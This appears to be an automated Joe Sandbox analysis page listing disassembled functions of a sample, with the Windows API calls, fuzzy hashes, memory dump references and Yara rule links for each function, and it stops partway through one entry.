Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Focus$ChildWindow
String ID:
API String ID: 501040988-0
Opcode ID: 7ae7cf33f0649bbfddae20d1f0a62f507f4acd5e53a9c83e0416f92748ec72cf
Instruction ID: 593d1786af100e45f3dc5da590329d875a768c4fed184a1308f340758402b191
Opcode Fuzzy Hash: 7ae7cf33f0649bbfddae20d1f0a62f507f4acd5e53a9c83e0416f92748ec72cf
Instruction Fuzzy Hash: 0D3169B5600705AFDB24CFA8CC84F6BB7E8FB48710F20862DE96987790DB34A904CB54

Function 0042A5B0 Relevance: 6.1, APIs: 4, Instructions: 75fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0042A5DA
GetFileSize.KERNEL32(00000000,00000000), ref: 0042A5EA
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0042A622
CloseHandle.KERNEL32(00000000), ref: 0042A634

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: e7a6ba72f83ff74a2867d1e2b198b241d2b6449d0a3b992f5f863392b97e59b6
Instruction ID: f76ff96595e95f74c71594774e9d732ce93bf559fa4622e3cdbde4d7c9f374e5
Opcode Fuzzy Hash: e7a6ba72f83ff74a2867d1e2b198b241d2b6449d0a3b992f5f863392b97e59b6
Instruction Fuzzy Hash: 7911B4317822247BDB219E14AC45FAB776CAF42B10F08029AFC44A7380DBB49D16C7E9

Function 00444550 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_memmove_s.LIBCMT ref: 00444582
_memmove_s.LIBCMT ref: 004445A0
__recalloc.LIBCMT ref: 004445B8
__recalloc.LIBCMT ref: 004445D7

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __recalloc_memmove_s
String ID:
API String ID: 1992126439-0
Opcode ID: 2db8bd80f64b054a3897fb89b493a91a79f165c39cd341f9c69927f25a41de60
Instruction ID: 67bfe94639931a2a40ca0e4519d54b2eabdb7bb960d7e8c4135de81b3624f322
Opcode Fuzzy Hash: 2db8bd80f64b054a3897fb89b493a91a79f165c39cd341f9c69927f25a41de60
Instruction Fuzzy Hash: 2D1184B6600B026FE720CE69DD84A6BB3E6EBD4304714CA1EE596C7744EB35E941C750

Function 00444730 Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00444751
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00444774
TranslateMessage.USER32(?), ref: 00444791
DispatchMessageW.USER32(?), ref: 00444798

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 6eed07a1de137a343f16607f55210179fe37b4095c5723a1a21d86fe1cafc308
Instruction ID: 0fac7e69ba9ad83552e9d8b8551bd64ae53e41f683b0e31269322f83ec5c5c78
Opcode Fuzzy Hash: 6eed07a1de137a343f16607f55210179fe37b4095c5723a1a21d86fe1cafc308
Instruction Fuzzy Hash: 93117030301605ABF7219B58CD89BBBB3ADEF86744F244227E605D72D0D768ED13869D

Function 0046E2F0 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E316
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0046E324
SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046E34C
SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 0046E365

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ecf94a62f26eeacc0b3ac7c39fde8e4ec8b901517570cba37ac92dc8c8cd249a
Instruction ID: 92d63199bf3ba3bd1b39ea87b3f604ecff6bdd8f92319aed1bb14121758a28bc
Opcode Fuzzy Hash: ecf94a62f26eeacc0b3ac7c39fde8e4ec8b901517570cba37ac92dc8c8cd249a
Instruction Fuzzy Hash: 11019672A4021867DB24DA6D9C81FEBB7ECDF98B21F044156FA04AF384D5E5DC4087A4

Function 0046E380 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E3A2
SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E3C3
SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046E3F1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 0046E3FF

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7d47e92251a524073868a7c109d101777243e95e9591a6cadf10de374a7af106
Instruction ID: a8aca7fbe68f332f40261ef60b8dbba9274b1c905ece51679bbb8e48558e1265
Opcode Fuzzy Hash: 7d47e92251a524073868a7c109d101777243e95e9591a6cadf10de374a7af106
Instruction Fuzzy Hash: 2C118275A003186BEB10DFA9DC85EDABBECAF58750F008115FA04AB280D6B4D9018BA4

Function 0046E000 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046E029
SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 0046E040
PathAddBackslashW.SHLWAPI(?), ref: 0046E051
_wcsnlen.LIBCMT ref: 0046E063

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Path$BackslashFolder_memset_wcsnlen
String ID:
API String ID: 355466527-0
Opcode ID: 7a33fdecb9513258b2daa65a6f1328a7f924869bcfe40f651878746a35876be4
Instruction ID: c3c8c16ad6002ca8db4496610c8fa53d1dc55c311b100ebd92f6ba53468d5b16
Opcode Fuzzy Hash: 7a33fdecb9513258b2daa65a6f1328a7f924869bcfe40f651878746a35876be4
Instruction Fuzzy Hash: B4014875A4031C67EB20DB719C46FEF73B89B14700F50099EB705962C1E6F4AA848B9D

Function 004871CD Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 004871DD
GetTopWindow.USER32(00000000), ref: 0048721C
GetWindow.USER32(00000000,00000002), ref: 0048723A

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 71420f6fec4517944b08a5d84e96511d90d96fac74d129915761e57692e7ec15
Instruction ID: 289d8979bcb36cba127df5438dbcb725fb24ebf788a1cb8ff988e87ebb58a85d
Opcode Fuzzy Hash: 71420f6fec4517944b08a5d84e96511d90d96fac74d129915761e57692e7ec15
Instruction Fuzzy Hash: CD01403200411ABBCF127F959C08EEF3F2AEF48390F154456FE1451121D739C962EBA9

Function 0049E4E5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0049E50B

Part of subcall function 0049E330: __fltout2.LIBCMT ref: 0049E35C

__cftog_l.LIBCMT ref: 0049E531
__cftoe_l.LIBCMT ref: 0049E563

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 2b3d422230432c192b45f569dd11a878a4019c89b8cafb0b6d0be2bf1e6fd384
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: BF11837204014EFBCF129EC6DC01CEE3F22BB18368B598426FE1859131D63ACA71AB85

Function 004866D5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 004866E2
GetTopWindow.USER32(00000000), ref: 004866F5

Part of subcall function 004866D5: GetWindow.USER32(00000000,00000002), ref: 0048673C

GetTopWindow.USER32(?), ref: 00486725

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 68d7a8da34205e048657e9c06a100d379f07f8b96ddc92c88d742dd533d4e848
Instruction ID: 1c32d4620a6206c68789083f241b8cf28c369af0658d722bbae67bfb0c664882
Opcode Fuzzy Hash: 68d7a8da34205e048657e9c06a100d379f07f8b96ddc92c88d742dd533d4e848
Instruction Fuzzy Hash: 09014F3200162AB7DF633F668C09E9F3A59AF543A8F06492AFD1455210DB39C911DBED

Function 00403380 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0040338B
EnterCriticalSection.KERNEL32(004E38E8,?,00469E5A,?,?,004021DD,000000FD,?,004BCD08), ref: 00403399
LeaveCriticalSection.KERNEL32(004E38E8,?,00469E5A,?,?,004021DD,000000FD,?,004BCD08), ref: 004033B2
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,00469E5A,?,?,004021DD,000000FD,?,004BCD08), ref: 004033C5

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$CurrentEnterExceptionLeaveRaiseThread
String ID:
API String ID: 2662421713-0
Opcode ID: 3345de824d857a755367f3ada095c75a2aca85782b3d7ee1937f48e7e6a745d0
Instruction ID: c65963e0d2d28ad02bd78bda5a70df122db7e5e8f990c26d462cb0cec2f60f02
Opcode Fuzzy Hash: 3345de824d857a755367f3ada095c75a2aca85782b3d7ee1937f48e7e6a745d0
Instruction Fuzzy Hash: 4EE0ED74941B41ABD6216F619D4DB193AE9FB04F03F10966DBA41AB690CB769500CB0C

Function 0048D383 Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__IsNonwritableInCurrentImage.LIBCMT ref: 0048D396

Part of subcall function 0049AC90: __FindPESection.LIBCMT ref: 0049ACEB

__getptd_noexit.LIBCMT ref: 0048D3A6
__freeptd.LIBCMT ref: 0048D3B0
ExitThread.KERNEL32 ref: 0048D3B9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
String ID:
API String ID: 3182216644-0
Opcode ID: ff77d569e2a3fe29cecff4faf5c907a73bd4f83868e40e322b30f7032af3a2c9
Instruction ID: abf51d41e15492fbb983ebccafd0bad4f67944ab30623d2699448fae5d2ac4ae
Opcode Fuzzy Hash: ff77d569e2a3fe29cecff4faf5c907a73bd4f83868e40e322b30f7032af3a2c9
Instruction Fuzzy Hash: 7AD01230911A01ABDB217F62DC0DB2B3B985F80759F54063ABC04841E1DFB8C990C66F

Function 004268F0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 479COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00426D59

Strings

tip:, xrefs: 00426A54
xK, xrefs: 00426A7F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClearVariant
String ID: tip:$xK
API String ID: 1473721057-3914292583
Opcode ID: cfe65434e61dabe73e7bdbfde77a0d517a24546f6981b8ce282e4c2b2f3a59fd
Instruction ID: c63cff6a0237a891473ee878d2458deaf71263266a40017f2bb62b9b39f3b64e
Opcode Fuzzy Hash: cfe65434e61dabe73e7bdbfde77a0d517a24546f6981b8ce282e4c2b2f3a59fd
Instruction Fuzzy Hash: 0102C371B00119DFDB00DFA9C880BEEB7B5AF99314F64815DE514AB391CB39AE05CBA4

Function 00440240 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 457COMMON

Download Yara Rule

Strings

AXWIN, xrefs: 00440593

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: AXWIN
API String ID: 0-1948516679
Opcode ID: 758e0e0f1fe1718a73692213017736f8edb31cdad68be6d343334c2c001d2bc1
Instruction ID: 44e0a74f98a3ad07866d65f659633ba2282cdbadd91c1263810b1026f8ecc6a9
Opcode Fuzzy Hash: 758e0e0f1fe1718a73692213017736f8edb31cdad68be6d343334c2c001d2bc1
Instruction Fuzzy Hash: E6020574600705AFEB14DFA8C880F6BB7A9FF89304F20895DEA699B390D775E911CB50

Function 0045A840 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 455COMMON

Download Yara Rule

APIs

Part of subcall function 0044C640: std::_Lockit::_Lockit.LIBCPMT ref: 0044C651

Part of subcall function 0045D340: std::_Lockit::_Lockit.LIBCPMT ref: 0045D36C
Part of subcall function 0045D340: std::_Lockit::_Lockit.LIBCPMT ref: 0045D38F

Part of subcall function 0044BC60: std::_Lockit::_Lockit.LIBCPMT ref: 0044BC70

_localeconv.LIBCMT ref: 0045A8E1
_strcspn.LIBCMT ref: 0045A9FC

Strings

e, xrefs: 0045A8F4

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LockitLockit::_std::_$_localeconv_strcspn
String ID: e
API String ID: 331173946-4024072794
Opcode ID: 365ca3d9b6c8385756e30168abca7fc9ce130e11c21cb565a6444df39ee1151e
Instruction ID: 460df75306ccaae4a8be6dae26e504ebc6c158edf0c799e3b896ceea4de7fa7d
Opcode Fuzzy Hash: 365ca3d9b6c8385756e30168abca7fc9ce130e11c21cb565a6444df39ee1151e
Instruction Fuzzy Hash: D3028E71A002489FCB04DF99C980ADEBBF5EF8D304F15826AF809AB352D734AD45CB95

Function 0042F530 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 306fileCOMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 0042F6F3
DeleteFileW.KERNEL32(?), ref: 0042F7DE

Strings

disable_resize, xrefs: 0042F7AC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CopyDeleteFileRect
String ID: disable_resize
API String ID: 1793271280-3964505410
Opcode ID: 65c04001a15ae0a86b9793ed44ebec87470b6cc65303f016cb299b83a2148874
Instruction ID: be84a9a713d30813d401dc4cfe295fc60682e0c7a2fa703565a3a9d277fab9d0
Opcode Fuzzy Hash: 65c04001a15ae0a86b9793ed44ebec87470b6cc65303f016cb299b83a2148874
Instruction Fuzzy Hash: 9BB18F71E00219DFCB04DFA8D880A9EBBF5EF88310F64866EE519A7391D735AD05CB94

Function 004522B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0045242C
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00452493

Part of subcall function 004A7F61: std::ios_base::_Tidy.LIBCPMT ref: 004A7F86

Strings

' is not a number., xrefs: 00452382
